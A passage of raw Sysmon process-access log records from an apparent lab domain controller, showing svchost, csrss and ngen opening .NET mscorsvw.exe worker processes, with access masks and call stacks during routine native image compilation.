13:23:58.893{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0D03-000000009A01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.877{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.877{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.846{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0C03-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.831{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.831{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.799{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0B03-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.799{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0B03-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.799{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0B03-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.784{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0A03-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.768{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0A03-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.768{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0A03-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.753{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0903-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.737{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0903-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.737{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0903-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.721{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0803-000000009A01}5036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.721{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0803-000000009A01}5036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.721{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0803-000000009A01}5036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.706{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0703-000000009A01}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.690{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0703-000000009A01}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.690{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0703-000000009A01}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.674{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.674{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0603-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 